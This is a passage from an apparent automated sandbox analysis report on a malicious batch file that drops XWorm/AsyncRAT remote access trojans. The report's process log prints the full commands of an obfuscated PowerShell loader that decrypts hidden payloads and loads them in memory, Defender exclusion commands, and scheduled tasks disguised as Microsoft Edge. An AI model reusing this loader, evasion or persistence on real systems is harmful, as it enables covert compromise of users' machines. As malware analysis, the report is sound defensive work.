                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeCode function: 25_2_00007FFD9B89F28D25_2_00007FFD9B89F28D
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeCode function: 25_2_00007FFD9B89CA9025_2_00007FFD9B89CA90
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeCode function: 25_2_00007FFD9B89CA3525_2_00007FFD9B89CA35
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeCode function: 25_2_00007FFD9B89F13825_2_00007FFD9B89F138
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeCode function: 25_2_00007FFD9B89C93B25_2_00007FFD9B89C93B
                    Source: 9.2.powershell.exe.13cd9398610.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 9.2.powershell.exe.13cd9398610.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 9.2.powershell.exe.13ce7acbf20.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 9.2.powershell.exe.13ce7acbf20.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 9.2.powershell.exe.13cd9398610.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 9.2.powershell.exe.13cd9398610.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000009.00000002.3313915112.0000013CE7ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 2.2.powershell.exe.2752ea29b20.4.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.powershell.exe.2752e96ff18.2.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.powershell.exe.2752e9d9ae8.3.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.powershell.exe.27536c90000.5.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, 84N5xNbP3Ka7hRYxGvBwVNzODlilcb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, 84N5xNbP3Ka7hRYxGvBwVNzODlilcb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, 84N5xNbP3Ka7hRYxGvBwVNzODlilcb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, GrXY7exn82kPguFyRBu66RyjvsKLK2.csBase64 encoded string: 'kaLIYmk7l1K4UTwGgDrFwrs97vcsKOFe35e1gSGs8mfuAqIdjPNlz0PRmwFm', 'VOgBRJlLgA4UcMEGjaJaqeTv0Xe7Xz20TeljNrG8LbxMlM4591EBV4m1N5BT'
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csBase64 encoded string: 'LHlufzkDWwlkki7xJuSZy7isMtNtmLNPgzB8JTXSx9NUkrHBt6VIFm17njbJ', 'sgUw2K9nSyoko24Vro1wJ2xyjwDofKnVjXQKAYJ79j38QXYadooyvXeVHCht', 'OhOcs4YXl6f4vZlVsn3nTelLHAp8AV7cGw4rtswt9ahjIc0x9NsTdbVPYhd0', 'P8SD0rynS0TyAaxQtER0Zq8nQLvNeZ23ef24kL1Z4jEh6ZYM9KT6TfP9NXh2', 'v4FMPVi9yxipr5XIPoC26qygyug7n3VfIaSKBMkIN1XWkLdxWzSSIgdVLm5A', 'wFZ89XnR07gRCJEvSgyrn4adTPDOOiboVF1c8I6PVQKTJVhs1T3oz9EAYc5O', 'oF2lmvg02CxXy7Bq8bM9TptR9ANlJZwyWSGUm7TS48vI8eUoQ2CH7B0c9d9e', 'ypq6WJUz6jBvkOGMjuE0wI3LyWzun47lXgGucCvQ6PLgTeV338LilHGUYGmV'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, GrXY7exn82kPguFyRBu66RyjvsKLK2.csBase64 encoded string: 'kaLIYmk7l1K4UTwGgDrFwrs97vcsKOFe35e1gSGs8mfuAqIdjPNlz0PRmwFm', 'VOgBRJlLgA4UcMEGjaJaqeTv0Xe7Xz20TeljNrG8LbxMlM4591EBV4m1N5BT'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csBase64 encoded string: 'LHlufzkDWwlkki7xJuSZy7isMtNtmLNPgzB8JTXSx9NUkrHBt6VIFm17njbJ', 'sgUw2K9nSyoko24Vro1wJ2xyjwDofKnVjXQKAYJ79j38QXYadooyvXeVHCht', 'OhOcs4YXl6f4vZlVsn3nTelLHAp8AV7cGw4rtswt9ahjIc0x9NsTdbVPYhd0', 'P8SD0rynS0TyAaxQtER0Zq8nQLvNeZ23ef24kL1Z4jEh6ZYM9KT6TfP9NXh2', 'v4FMPVi9yxipr5XIPoC26qygyug7n3VfIaSKBMkIN1XWkLdxWzSSIgdVLm5A', 'wFZ89XnR07gRCJEvSgyrn4adTPDOOiboVF1c8I6PVQKTJVhs1T3oz9EAYc5O', 'oF2lmvg02CxXy7Bq8bM9TptR9ANlJZwyWSGUm7TS48vI8eUoQ2CH7B0c9d9e', 'ypq6WJUz6jBvkOGMjuE0wI3LyWzun47lXgGucCvQ6PLgTeV338LilHGUYGmV'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, GrXY7exn82kPguFyRBu66RyjvsKLK2.csBase64 encoded string: 'kaLIYmk7l1K4UTwGgDrFwrs97vcsKOFe35e1gSGs8mfuAqIdjPNlz0PRmwFm', 'VOgBRJlLgA4UcMEGjaJaqeTv0Xe7Xz20TeljNrG8LbxMlM4591EBV4m1N5BT'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csBase64 encoded string: 'LHlufzkDWwlkki7xJuSZy7isMtNtmLNPgzB8JTXSx9NUkrHBt6VIFm17njbJ', 'sgUw2K9nSyoko24Vro1wJ2xyjwDofKnVjXQKAYJ79j38QXYadooyvXeVHCht', 'OhOcs4YXl6f4vZlVsn3nTelLHAp8AV7cGw4rtswt9ahjIc0x9NsTdbVPYhd0', 'P8SD0rynS0TyAaxQtER0Zq8nQLvNeZ23ef24kL1Z4jEh6ZYM9KT6TfP9NXh2', 'v4FMPVi9yxipr5XIPoC26qygyug7n3VfIaSKBMkIN1XWkLdxWzSSIgdVLm5A', 'wFZ89XnR07gRCJEvSgyrn4adTPDOOiboVF1c8I6PVQKTJVhs1T3oz9EAYc5O', 'oF2lmvg02CxXy7Bq8bM9TptR9ANlJZwyWSGUm7TS48vI8eUoQ2CH7B0c9d9e', 'ypq6WJUz6jBvkOGMjuE0wI3LyWzun47lXgGucCvQ6PLgTeV338LilHGUYGmV'
                    Source: 2.2.powershell.exe.2752e96ff18.2.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 2.2.powershell.exe.2752e96ff18.2.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 2.2.powershell.exe.2752ea29b20.4.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 2.2.powershell.exe.2752ea29b20.4.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 2.2.powershell.exe.27536c90000.5.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 2.2.powershell.exe.27536c90000.5.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 2.2.powershell.exe.2752e9d9ae8.3.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 2.2.powershell.exe.2752e9d9ae8.3.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, BDWSQN6Hp8X5gTSet0rxbg6KqNmPuWcMNwjVY.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, BDWSQN6Hp8X5gTSet0rxbg6KqNmPuWcMNwjVY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, BDWSQN6Hp8X5gTSet0rxbg6KqNmPuWcMNwjVY.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, BDWSQN6Hp8X5gTSet0rxbg6KqNmPuWcMNwjVY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, BDWSQN6Hp8X5gTSet0rxbg6KqNmPuWcMNwjVY.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, BDWSQN6Hp8X5gTSet0rxbg6KqNmPuWcMNwjVY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.expl.evad.winBAT@33/35@2/2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\startup_str_533.vbsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_26550411
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\69vcZ7OoJKSVKHuB
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dggu2acs.qf4.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\startup_str_466.bat" "
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_533_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_533.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\startup_str_466.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_533_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_533.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_533.vbs"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_533.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_533.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft Edge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Roaming\Microsoft Edge.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft Edge.exe "C:\Users\user\AppData\Roaming\Microsoft Edge.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join 